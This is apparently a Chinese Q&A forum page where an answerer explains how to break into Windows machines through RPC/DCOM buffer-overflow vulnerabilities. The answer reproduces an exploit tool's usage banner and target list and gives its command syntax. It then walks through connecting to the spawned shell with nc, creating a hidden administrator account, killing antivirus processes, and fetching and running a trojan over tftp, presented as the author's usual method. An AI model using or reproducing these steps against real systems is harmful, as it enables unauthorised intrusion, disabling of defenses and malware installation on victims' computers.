RPC是一般用在网上邻居的攻击。 通过CMDSHELL攻击。先建立帐户。再把帐户加入ADMINISTRATOR组。 再下来,HOHO~~~ 不能教喔。呵呵 如果只是想玩玩的话,那还放弃吧。如果想学习下技术。真正的HACKER是不会这样弱的问题的喔。这样简单的问题,还是自学吧。 不是不想教你。而是。。。。。 本人虽然会,可不想让社会上都一些脚本小子喔!!!
声明:本人回答问题一向原创,从不曾抄袭 RPC漏洞分很多 最开始从冲击波开始,震荡波,最近的魔波都属于RPC漏洞攻击 首先使用RPC漏洞针对这些漏洞的扫描器进行扫描最近发现一个软件比较不错名字叫TK2006,可以扫描很多RPC漏洞,并且直接溢出得到SHELL 不过我测试很多,不容易成功,也许是SP2的WINDOWS 防火墙在起作用 如果想玩玩的话,可以用这个扫描,再找专用的溢出工具进行溢出例如早先的MS04011这个是我在SP1的时候溢出成功率最高的 F:\hack\hack\hack\rpc\xp。
exe --------------------------------------------------------- - 远程 DCOM RPC 缓冲区溢出 - Original code by FlashSky and Benjurry - Rewritten by HDM - EXE 文件编译及修改:sagi - Usage: /cygdrive/f/hack/hack/hack/rpc/xp - Targets: - 0 Windows 2000 SP0 (english) - 1 Windows 2000 SP0 (english2) - 2 Windows 2000 SP1 (english) - 3 Windows 2000 SP2 (english) - 4 Windows 2000 SP2 (english2) - 5 Windows 2000 SP3 (english) - 6 Windows 2000 SP3 (english2) - 7 Windows 2000 SP3 (english3) - 8 Windows 2000 SP4 (english) - 9 Windows XP SP0 (english) - 10 Windows XP SP1 (english) - 11 Windows XP SP1 (english2) - 12 Windows XP SP2 (english) - 13 Windows 2000 SP3 (chinese) - 14 Windows 2000 SP4 (chinese) - 15 Windows XP SP0 (chinese) - 16 Windows XP SP1 (chinese) - 17 Windows 2000 SP0 (japanese) - 18 Windows 2000 SP1 (japanese) - 19 Windows 2000 SP2 (japanese) - 20 Windows 2000 SP0-1 (big5) - 21 Windows 2000 SP3 (big5) - 22 Windows 2000 SP4 (big5) - 23 Windows XP SP0-1 (big5) - 24 Windows 2000 SP0 (korean) - 25 Windows 2000 SP1 (korean) - 26 Windows 2000 SP2 (korean) - 27 Windows 2000 SP4 (korean) 上面是这个溢出程序的说明 在命令行的格式是这样的 C:\xp 16 XP是溢出程序 16 是要溢出的系统版本 是要溢出的IP地址 如果溢出提示成功的话,会提示端口号 一般用TELNET来连接,比如溢出端口号为1234 命令写: C:\telnet 1234 但是TELNET连接是完全盲打的,不显示任何文字 所以我用NC。
exe nc 1234 具体NC还有很多参数,见BAIDU 如果提示成功的话就会登陆到对方的 C:\WINDOWS\SYSTEM目录下了 这个时候添加管理员帐户,NET USER IMTJSUN 1234 /AD 提升权限 NET LOCALGROUP ADMINISTRATORS IMTJSUN /AD 一般我会先列出进程,检查有没有杀毒软件 输入:tasklist 如果有比如瑞星进程,TASKKILL 掉那个进程 下一步上传病毒 我用tftp32。
exe 在本机使用这个程序可以做成一个小的FTP服务器 GET木马程序 然后 执行木马程序 最后远程连接 这个是我一惯使用的伎俩 注:本人已经不在研究这些东西很久了,难免有些过时,见谅!! 再次声明:本人回答问题一向原创,从不曾抄袭 。
答:详情>>
答:攻击工具具有三个特点:反侦破,攻击者采用隐蔽攻击工具特性的技术,这使安全专家分析新攻击工具和了解新攻击行为所耗费的时间增多;动态行为,早期的攻击工具是以单一确定...详情>>
答:1、重新启动机器并在出现Staring windows提示时,按F5键进入命令行状态。在C:\windows\system\目录下输入以下命令:del nets...详情>>
